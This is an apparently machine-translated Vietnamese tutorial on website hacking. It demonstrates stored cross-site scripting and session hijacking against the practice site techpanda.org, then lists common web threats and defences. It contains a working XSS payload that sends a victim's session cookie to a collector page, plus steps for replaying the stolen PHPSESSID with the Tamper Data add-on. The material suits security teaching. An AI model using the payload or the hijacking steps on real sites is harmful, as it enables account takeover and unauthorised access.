Làm thế nào để hack một trang web? Các kỹ thuật hack trang web phổ biến

Kỹ thuật hack trang web

Nhiều người có quyền truy cập internet hơn bao giờ hết. Điều này đã thúc đẩy nhiều tổ chức phát triển các ứng dụng dựa trên web mà người dùng có thể sử dụng trực tuyến để tương tác với tổ chức. Mã được viết kém cho các ứng dụng web có thể bị khai thác để truy cập trái phép vào dữ liệu nhạy cảm và máy chủ web.

Trong hướng dẫn này, bạn sẽ học cách hack các trang web và chúng tôi sẽ giới thiệu cho bạn kỹ thuật hack ứng dụng web và các biện pháp đối phó bạn có thể thiết lập để bảo vệ chống lại các cuộc tấn công như vậy.

Cách hack một trang web

Trong kịch bản thực tế về việc hack trang web này, chúng tôi sẽ chiếm quyền điều khiển phiên người dùng của ứng dụng web có tại www.techpanda.org. Chúng tôi sẽ sử dụng tập lệnh chéo trang để đọc id phiên cookie, sau đó sử dụng nó để mạo danh phiên người dùng hợp pháp.

Giả định được đưa ra là kẻ tấn công có quyền truy cập vào ứng dụng web và hắn muốn chiếm quyền điều khiển phiên của những người dùng khác sử dụng cùng một ứng dụng. Mục tiêu của cuộc tấn công này có thể là giành quyền truy cập của quản trị viên vào ứng dụng web với giả định tài khoản truy cập của kẻ tấn công là tài khoản hạn chế.

Bước 1) Mở URL http://www.techpanda.org/.

Vì mục đích thực hành, chúng tôi thực sự khuyên bạn nên có quyền truy cập bằng cách sử dụng SQL Insert. Tham khảo cái này bài viết để biết thêm thông tin về cách thực hiện điều đó.

Bước 2) Nhập thông tin đăng nhập.

Email đăng nhập là quản trị viên@google.com, mật khẩu là Pass2010.

Bước 3) Kiểm tra bảng điều khiển.

Nếu bạn đã đăng nhập thành công, bạn sẽ nhận được bảng điều khiển sau

Hack một trang web

Bước 4) Nhập nội dung mới.

Nhấp vào Thêm liên hệ mới và nhập thông tin sau làm tên

<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>

Bước 5) Thêm Javascript.

Đoạn mã trên sử dụng JavaScript. Nó thêm một siêu liên kết với sự kiện onclick. Khi người dùng không nghi ngờ nhấp vào liên kết, sự kiện sẽ truy xuất PHP ID phiên cookie và gửi nó đến snatch_sess_id.php trang cùng với id phiên trong URL

Hack một trang web

Bước 6) Thêm chi tiết.

Nhập các thông tin còn lại như hiển thị bên dưới và Nhấp vào Lưu thay đổi

Hack một trang web

Bước 7) Kiểm tra bảng điều khiển.

Bảng điều khiển của bạn bây giờ sẽ trông giống như màn hình sau

Hack một trang web

Bước 8) Kiểm tra id phiên.

  • Vì mã tập lệnh chéo trang được lưu trữ trong cơ sở dữ liệu nên nó sẽ được tải mỗi khi người dùng có quyền truy cập đăng nhập
  • Giả sử quản trị viên đăng nhập và nhấp vào siêu liên kết có nội dung Dark
  • Anh ấy/cô ấy sẽ nhận được cửa sổ có ID phiên hiển thị trong URL
  • Hack một trang web

    Chú thích: tập lệnh có thể gửi giá trị đến một số máy chủ từ xa nơi PHPSESSID được lưu trữ sau đó người dùng chuyển hướng quay lại trang web như không có gì xảy ra.

    Chú thích: giá trị bạn nhận được có thể khác với giá trị trên trang web này hướng dẫn hack, nhưng khái niệm thì giống nhau

    Phiên mạo danh sử dụng Firefox và tiện ích bổ sung Dữ liệu giả mạo

    Sơ đồ dưới đây cho thấy các bước bạn phải thực hiện để hoàn thành bài tập này.

    Phiên mạo danh sử dụng Firefox và tiện ích bổ sung Dữ liệu giả mạo

    • Bạn sẽ cần Firefox trình duyệt web cho phần này và tiện ích bổ sung Dữ liệu giả mạo
    • Mở Firefox và cài đặt phần bổ sung như trong sơ đồ bên dưới

    Phiên mạo danh sử dụng Firefox và tiện ích bổ sung Dữ liệu giả mạo

    Phiên mạo danh sử dụng Firefox và tiện ích bổ sung Dữ liệu giả mạo

    • Tìm kiếm dữ liệu giả mạo sau đó nhấp vào cài đặt như hình trên

    Phiên mạo danh sử dụng Firefox và tiện ích bổ sung Dữ liệu giả mạo

    • Nhấp vào Chấp nhận và cài đặt…

    Phiên mạo danh sử dụng Firefox và tiện ích bổ sung Dữ liệu giả mạo

    Phiên mạo danh sử dụng Firefox và tiện ích bổ sung Dữ liệu giả mạo

    • Nhấp vào Khởi động lại ngay khi quá trình cài đặt hoàn tất
    • Kích hoạt thanh menu trong Firefox nếu nó không được hiển thị

    Phiên mạo danh sử dụng Firefox và tiện ích bổ sung Dữ liệu giả mạo

    • Bấm vào menu công cụ sau đó chọn Tamper Data như hình bên dưới

    Phiên mạo danh sử dụng Firefox và tiện ích bổ sung Dữ liệu giả mạo

    • Bạn sẽ nhận được cửa sổ sau. Lưu ý: Nếu Windows không trống, nhấn nút xóa

    Phiên mạo danh sử dụng Firefox và tiện ích bổ sung Dữ liệu giả mạo

    • Bấm vào menu Bắt đầu giả mạo
    • Chuyển về Firefox trình duyệt web, gõ http://www.techpanda.org/dashboard.php sau đó nhấn phím enter để tải trang
    • Bạn sẽ nhận được cửa sổ bật lên sau từ Tamper Data

    Phiên mạo danh sử dụng Firefox và tiện ích bổ sung Dữ liệu giả mạo

    • Cửa sổ bật lên có ba (3) tùy chọn. Tùy chọn Tamper cho phép bạn sửa đổi thông tin tiêu đề HTTP trước khi nó được gửi tới máy chủ.
    • Nhấn vào nó
    • Bạn sẽ nhận được cửa sổ sau

    Phiên mạo danh sử dụng Firefox và tiện ích bổ sung Dữ liệu giả mạo

    • Sao chép ID phiên PHP bạn đã sao chép từ URL tấn công và dán nó sau dấu bằng. Giá trị của bạn bây giờ sẽ trông như thế này
    PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
    • Bấm vào nút OK
    • Bạn sẽ nhận lại được cửa sổ bật lên dữ liệu Tamper

    Phiên mạo danh sử dụng Firefox và tiện ích bổ sung Dữ liệu giả mạo

    • Bỏ chọn hộp kiểm có nội dung hỏi Tiếp tục can thiệp?
    • Bấm vào nút gửi khi hoàn tất
    • Bạn sẽ có thể thấy bảng điều khiển như hiển thị bên dưới

    Phiên mạo danh sử dụng Firefox và tiện ích bổ sung Dữ liệu giả mạo

    Chú thích: chúng tôi đã không đăng nhập, chúng tôi đã mạo danh một phiên đăng nhập bằng cách sử dụng giá trị PHPSESSID mà chúng tôi đã truy xuất bằng cách sử dụng tập lệnh chéo trang

    Ứng dụng web là gì? Các mối đe dọa web là gì?

    Ứng dụng web (hay còn gọi là trang web) là một ứng dụng dựa trên mô hình client-server. Các máy chủ cung cấp quyền truy cập cơ sở dữ liệu và logic nghiệp vụ. Nó được lưu trữ trên một máy chủ web. Ứng dụng khách chạy trên trình duyệt web của khách hàng. Các ứng dụng web thường được viết bằng các ngôn ngữ như Java, C# và VB.Net, PHP, Ngôn ngữ đánh dấu ColdFusion, v.v. các công cụ cơ sở dữ liệu được sử dụng trong các ứng dụng web bao gồm MySQL, Máy chủ MS SQL, PostgreSQL, SQLite, Vv

    Kỹ thuật hack trang web hàng đầu

    Hầu hết các ứng dụng web được lưu trữ trên các máy chủ công cộng có thể truy cập qua Internet. Điều này khiến chúng dễ bị tấn công do khả năng truy cập dễ dàng. Sau đây là các mối đe dọa phổ biến đối với ứng dụng web.

    • SQL Injection – mục tiêu của mối đe dọa này có thể là bỏ qua các thuật toán đăng nhập, phá hoại dữ liệu, v.v.
    • Sự từ chối của dịch vụ tấn công– mục tiêu của mối đe dọa này có thể là từ chối quyền truy cập hợp pháp của người dùng vào tài nguyên
    • XSS tập lệnh chéo trang– mục tiêu của mối đe dọa này có thể là tiêm mã có thể được thực thi trên trình duyệt phía máy khách.
    • Ngộ độc cookie/phiên– mục tiêu của mối đe dọa này là kẻ tấn công sửa đổi cookie/dữ liệu phiên để có được quyền truy cập trái phép.
    • Giả mạo biểu mẫu – mục tiêu của mối đe dọa này là sửa đổi dữ liệu biểu mẫu như giá trong các ứng dụng thương mại điện tử để kẻ tấn công có thể nhận được các mặt hàng với giá giảm.
    • Chèn mã – mục tiêu của mối đe dọa này là tiêm nhiễm mã như PHP, Python, v.v. có thể được thực thi trên máy chủ. Mã có thể cài đặt cửa hậu, tiết lộ thông tin nhạy cảm, v.v.
    • làm xấu mặt– mục tiêu của mối đe dọa này là sửa đổi trang được hiển thị trên một trang web và chuyển hướng tất cả các yêu cầu trang đến một trang duy nhất chứa thông báo của kẻ tấn công.

    Làm cách nào để bảo vệ trang web của bạn khỏi bị hack?

    Một tổ chức có thể áp dụng chính sách sau để bảo vệ mình khỏi các cuộc tấn công vào máy chủ web.

    • SQL Injection – vệ sinh và xác thực các thông số người dùng trước khi gửi chúng đến cơ sở dữ liệu để xử lý có thể giúp giảm nguy cơ bị tấn công thông qua SQL Injection. Các công cụ cơ sở dữ liệu như MS SQL Server, MySQL, v.v. các tham số hỗ trợ và các câu lệnh đã chuẩn bị. Chúng an toàn hơn nhiều so với các câu lệnh SQL truyền thống
    • Sự từ chối của dịch vụ tấn công - tường lửa có thể được sử dụng để loại bỏ lưu lượng truy cập từ địa chỉ IP đáng ngờ nếu cuộc tấn công là một DoS đơn giản. Cấu hình mạng và Hệ thống phát hiện xâm nhập phù hợp cũng có thể giúp giảm nguy cơ xảy ra sự cố. DoS tấn công thành công.
    • Kịch bản chéo trang web – xác thực và dọn dẹp các tiêu đề, tham số được truyền qua URL, tham số biểu mẫu và giá trị ẩn có thể giúp giảm các cuộc tấn công XSS.
    • Ngộ độc cookie/phiên – điều này có thể được ngăn chặn bằng cách mã hóa nội dung của cookie, tạm dừng cookie sau một thời gian, liên kết cookie với địa chỉ IP máy khách đã được sử dụng để tạo chúng.
    • Ủ hình thức – điều này có thể được ngăn chặn bằng cách xác thực và xác minh thông tin đầu vào của người dùng trước khi xử lý nó.
    • Tiêm mã – điều này có thể được ngăn chặn bằng cách xử lý tất cả các tham số dưới dạng dữ liệu thay vì mã thực thi. Việc vệ sinh và xác nhận có thể được sử dụng để thực hiện điều này.
    • Sự biến dạng – một chính sách bảo mật phát triển ứng dụng web tốt phải đảm bảo rằng nó niêm phong Các lỗ hổng thường được sử dụng để truy cập máy chủ web. Đây có thể là cấu hình phù hợp của hệ điều hành, phần mềm máy chủ web và các phương pháp bảo mật tốt nhất khi phát triển ứng dụng web.
    Kiểm tra điều này: 9 máy quét URL tốt nhất để kiểm tra liên kết có an toàn trước phần mềm độc hại không

    Tổng kết

    • Một ứng dụng web dựa trên mô hình máy chủ-máy khách. Phía máy khách sử dụng trình duyệt web để truy cập tài nguyên trên máy chủ.
    • Các ứng dụng web thường có thể truy cập được qua internet. Điều này khiến chúng dễ bị tấn công.
    • Các mối đe dọa ứng dụng web bao gồm SQL tiêm, Code tiêm, XSS, Defacement, ngộ độc Cookie, v.v.
    • Chính sách bảo mật tốt khi phát triển ứng dụng web có thể giúp đảm bảo an toàn cho chúng.